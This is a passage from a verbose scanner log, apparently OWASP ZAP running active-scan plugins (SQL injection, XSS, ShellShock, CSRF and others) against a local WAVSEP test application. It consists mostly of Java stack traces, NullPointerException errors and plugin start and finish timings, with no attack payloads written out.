org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5871167 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid authority org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5872795 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5879596 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestParameterTamper in 158.603s 5879596 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestPersistentXSSPrime strength LOW threshold MEDIUM 6025914 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestPersistentXSSPrime in 146.318s 6025914 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestPersistentXSSSpider strength LOW threshold MEDIUM 6207437 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestPersistentXSSSpider in 181.523s 6207438 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestPersistentXSSAttack strength LOW threshold MEDIUM 6315919 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestPersistentXSSAttack in 108.481s 6315919 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | ScriptsActiveScanner strength LOW threshold MEDIUM 6425873 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | ScriptsActiveScanner in 109.954s 6425873 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SourceCodeDisclosureSVN strength LOW threshold MEDIUM 6528949 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.SourceCodeDisclosureSVN - Error executing SQL on temporary SVN SQLite database 'jdbc:sqlite:/tmp/sqlite_svn_wc_db4377393330239476054.tmp': java.sql.SQLException: [SQLITE_NOTADB] File opened that is not a database file (file is encrypted or is not a database) 6529150 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.SourceCodeDisclosureSVN - Error executing SQL on temporary SVN SQLite database 'jdbc:sqlite:/tmp/sqlite_svn_wc_db2516899047965540993.tmp': java.sql.SQLException: [SQLITE_NOTADB] File opened that is not a database file (file is encrypted or is not a database) 6529151 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.SourceCodeDisclosureSVN - Error executing SQL on temporary SVN SQLite database 'jdbc:sqlite:/tmp/sqlite_svn_wc_db7754933792106624180.tmp': java.sql.SQLException: [SQLITE_NOTADB] File opened that is not a database file (file is encrypted or is not a database) 6529352 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.SourceCodeDisclosureSVN - Error executing SQL on temporary SVN SQLite database 'jdbc:sqlite:/tmp/sqlite_svn_wc_db1510433394008183590.tmp': java.sql.SQLException: [SQLITE_NOTADB] File opened that is not a database file (file is encrypted or is not a database) 6529553 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.SourceCodeDisclosureSVN - Error executing SQL on temporary SVN SQLite database 'jdbc:sqlite:/tmp/sqlite_svn_wc_db3828839638183687253.tmp': java.sql.SQLException: [SQLITE_NOTADB] File opened that is not a database file (file is encrypted or is not a database) 6597585 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SourceCodeDisclosureSVN in 171.712s 6597585 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SourceCodeDisclosureWEBINF strength LOW threshold MEDIUM 6597585 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | ShellShockScanner strength LOW threshold MEDIUM 6597600 [ZAP-ActiveScanner-0] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SourceCodeDisclosureWEBINF in 0.014s 6705793 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 6705793 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 6705798 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 6706227 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 6706229 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 6745393 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | ShellShockScanner in 147.808s 6745393 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | Csrftokenscan strength LOW threshold MEDIUM 6807300 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException at org.parosproxy.paros.model.SiteNode.hasAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.HistoryReference.addAlert(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.addAlertToTreeEventHandler(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.addAlertToTree(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.alertFound(Unknown Source) at org.zaproxy.zap.extension.ascan.ActiveScanController$1.alertFound(Unknown Source) at org.parosproxy.paros.core.scanner.Scanner.notifyAlertFound(Unknown Source) at org.parosproxy.paros.core.scanner.HostProcess.alertFound(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.bingo(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.bingo(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.Csrftokenscan.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 6807300 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException at org.parosproxy.paros.model.SiteNode.hasAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.HistoryReference.addAlert(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.addAlertToTreeEventHandler(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.addAlertToTree(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.alertFound(Unknown Source) at org.zaproxy.zap.extension.ascan.ActiveScanController$1.alertFound(Unknown Source) at org.parosproxy.paros.core.scanner.Scanner.notifyAlertFound(Unknown Source) at org.parosproxy.paros.core.scanner.HostProcess.alertFound(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.bingo(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.bingo(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.Csrftokenscan.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 6807501 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException at org.parosproxy.paros.model.SiteNode.hasAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.HistoryReference.addAlert(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.addAlertToTreeEventHandler(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.addAlertToTree(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.alertFound(Unknown Source) at org.zaproxy.zap.extension.ascan.ActiveScanController$1.alertFound(Unknown Source) at org.parosproxy.paros.core.scanner.Scanner.notifyAlertFound(Unknown Source) at org.parosproxy.paros.core.scanner.HostProcess.alertFound(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.bingo(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.bingo(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.Csrftokenscan.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 6807504 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException at org.parosproxy.paros.model.SiteNode.hasAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.SiteNode.addAlert(Unknown Source) at org.parosproxy.paros.model.HistoryReference.addAlert(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.addAlertToTreeEventHandler(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.addAlertToTree(Unknown Source) at org.zaproxy.zap.extension.alert.ExtensionAlert.alertFound(Unknown Source) at org.zaproxy.zap.extension.ascan.ActiveScanController$1.alertFound(Unknown Source) at org.parosproxy.paros.core.scanner.Scanner.notifyAlertFound(Unknown Source) at org.parosproxy.paros.core.scanner.HostProcess.alertFound(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.bingo(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.bingo(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.Csrftokenscan.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 6807701 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6807701 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6807902 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6807902 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808103 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808103 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808305 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808307 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808505 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808505 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808706 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808706 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6808917 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6809118 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6809644 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6809644 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6809845 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6809845 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810045 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810046 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810247 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810247 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810452 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810453 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810653 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810653 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810854 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6810854 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811055 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811055 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811255 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811255 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811456 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811458 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811657 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811657 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811858 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6811858 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812061 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812062 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812263 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812468 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812468 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812668 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812670 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812870 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6812870 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813070 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813070 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813271 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813271 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813472 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813472 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813673 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813673 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813874 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6813874 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6814075 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6814075 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6814275 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6814697 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6814698 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6814900 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6814900 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815099 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815099 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815300 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815300 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815501 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815501 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815702 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815702 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815903 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6815903 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6816104 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6816843 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6816844 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817045 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817045 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817245 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817245 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817446 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817446 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817647 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817647 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817848 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6817848 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6818049 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6818049 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6818249 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6818450 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 6818450 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | Csrftokenscan in 73.057s 6818450 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | HeartBleedActiveScanner strength LOW threshold MEDIUM 6818454 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | CrossDomainScanner strength LOW threshold MEDIUM 6818455 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SourceCodeDisclosureCVE20121823 strength LOW threshold MEDIUM 6818457 [ZAP-ActiveScanner-0] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | HeartBleedActiveScanner in 0.007s 6818468 [ZAP-ActiveScanner-1] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | CrossDomainScanner in 0.014s 6992834 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SourceCodeDisclosureCVE20121823 in 174.379s 6992835 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | RemoteCodeExecutionCVE20121823 strength LOW threshold MEDIUM 7177293 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | RemoteCodeExecutionCVE20121823 in 184.458s 7177293 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SessionFixation strength LOW threshold MEDIUM 7178846 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SessionFixation in 1.553s 7178846 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SQLInjectionMySQL strength LOW threshold MEDIUM 7207925 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 7207925 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 7207931 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 7208753 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 7208755 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 7277449 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.SQLInjectionMySQL - An error occurred checking a url for MySQL SQL Injection vulnerabilities java.net.SocketException: Connection reset at java.net.SocketInputStream.read(SocketInputStream.java:196) at java.net.SocketInputStream.read(SocketInputStream.java:122) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read(BufferedInputStream.java:254) at org.apache.commons.httpclient.HttpParser.readRawLine(HttpParser.java:78) at org.apache.commons.httpclient.HttpParser.readLine(HttpParser.java:106) at org.apache.commons.httpclient.HttpConnection.readLine(HttpConnection.java:1116) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.readLine(MultiThreadedHttpConnectionManager.java:1413) at org.apache.commons.httpclient.HttpMethodBase.readStatusLine(Unknown Source) at org.zaproxy.zap.ZapGetMethod.readResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.execute(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.SQLInjectionMySQL.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 